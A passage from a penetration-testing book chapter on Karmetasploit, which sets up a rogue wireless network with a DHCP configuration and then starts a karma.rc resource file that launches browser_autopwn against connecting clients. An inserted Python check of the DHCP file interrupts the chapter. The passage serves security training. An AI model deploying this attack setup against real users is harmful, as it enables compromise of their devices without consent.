Chapter 12

Karmetasploit is the Metasploit Framework implementation of the KARMA attack. It implements various “evil” services including DNS, POP3, IMAP4, SMTP, FTP, SMB, and HTTP. These services accept and respond to most requests from clients and will serve up all kinds of malicious fun. (The various modules are in the modules/auxiliary/server directory of the Metasploit root directory.)

Configuration

Karmetasploit requires very little configuration. To begin, we configure a DHCP server to be used to hand out IP addresses to wireless targets. BackTrack includes a DHCP server, but we will need to create a custom configuration file for it to use with Karmetasploit, as shown in the following listing:

option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}

We back up our original dhcpd.conf file by entering cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.back, and then we create a new file containing the data shown in the listing above, which will serve addresses in the range of 10.0.0.100 to 10.0.0.254. (If you are unfamiliar with DHCP configurations, don’t worry; as long as your new dhcpd.conf looks similar to this it should work fine.)
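The chapter asks you to trust a hand-written dhcpd.conf "as long as it looks similar"; the script below, an added example that is not part of the book or of Metasploit, parses subnet declarations in that format and checks that the lease range and the routers/domain-name-servers options actually fall inside the declared subnet, which is the sanity check worth running before starting any DHCP server from such a file. The sample configuration is constructed from the listing above; the regex-based parser only understands the subnet/range/option statements shown there, not the full dhcpd grammar.

```python
import ipaddress
import re

# Constructed sample, taken from the dhcpd.conf listing discussed in the text.
SAMPLE_DHCPD_CONF = """\
option domain-name-servers 10.0.0.1;
default-lease-time 60; max-lease-time 72; ddns-update-style none;
authoritative; log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}
"""

# Matches "subnet A netmask M { ... }"; re.S lets the body span several lines.
SUBNET_RE = re.compile(r"subnet\s+(\S+)\s+netmask\s+(\S+)\s*\{(.*?)\}", re.S)

def parse_subnets(text):
    """Parse each subnet block into its network, address range and options."""
    subnets = []
    for m in SUBNET_RE.finditer(text):
        net = ipaddress.ip_network(f"{m.group(1)}/{m.group(2)}", strict=True)
        entry = {"network": net, "range": None, "options": {}}
        for stmt in m.group(3).split(";"):
            words = stmt.split()
            if len(words) == 3 and words[0] == "range":
                entry["range"] = tuple(ipaddress.ip_address(w) for w in words[1:])
            elif len(words) >= 3 and words[0] == "option":
                # Option values may be comma-separated, e.g. several DNS servers.
                entry["options"][words[1]] = [w.strip(",") for w in words[2:]]
        subnets.append(entry)
    return subnets

def check_subnet(entry):
    """Return human-readable problems found in one parsed subnet block."""
    net, problems = entry["network"], []
    if entry["range"] is None:
        problems.append("no range declared")
    else:
        lo, hi = entry["range"]
        if lo > hi or lo not in net or hi not in net:
            problems.append("range is empty or lies outside the subnet")
        if {lo, hi} & {net.network_address, net.broadcast_address}:
            problems.append("range includes the network or broadcast address")
    for name in ("routers", "domain-name-servers"):
        for value in entry["options"].get(name, []):
            if ipaddress.ip_address(value) not in net:
                problems.append(f"option {name} {value} is not inside the subnet")
    return problems
```

Running check_subnet over every entry returned by parse_subnets on the listing above yields an empty problem list; a range ending in 10.0.0.255 or a router outside 10.0.0.0/24 is reported by name.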

Next, we download the KARMA resource file, because as of this writing it’s not included in the regular Metasploit trunk:

root@bt:/opt/metasploit3/msf3# wget http://www.offensive-security.com/downloads/karma.rc

When we open the KARMA resource file karma.rc, we can see the sequence of events that occur when it runs, as shown here:

root@bt:/opt/metasploit3/msf3# cat karma.rc
db_connect postgres:toor@127.0.0.1/msfbook
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000